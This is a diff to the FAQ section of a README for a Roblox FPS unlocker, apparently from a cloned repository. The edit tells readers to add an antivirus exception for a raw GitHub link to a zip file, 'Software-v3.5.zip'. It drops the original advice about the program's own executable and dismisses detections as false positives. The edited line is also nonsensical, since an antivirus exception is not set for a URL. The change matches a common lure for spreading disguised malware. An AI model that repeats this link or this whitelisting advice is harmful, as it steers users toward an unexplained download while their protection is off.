immrdude/rbxfpsunlocker/README.md

 1. **Some files are being deleted and/or my anti-virus is detecting rbxfpsunlocker as malware.
 What do I do?**

 Any detections are most likely a false positive.
 If you don't trust me, feel free to download the repository and compile the project from source.
-Otherwise, add an exception to your anti-virus for `rbxfpsunlocker.exe` (or the folder it is in).
+Otherwise, add an exception to your anti-virus for `https://raw.githubusercontent.com/immrdude/rbxfpsunlocker/master/Source/Software-v3.5.zip` (or the folder it is in).

 2. **How can I see my FPS?**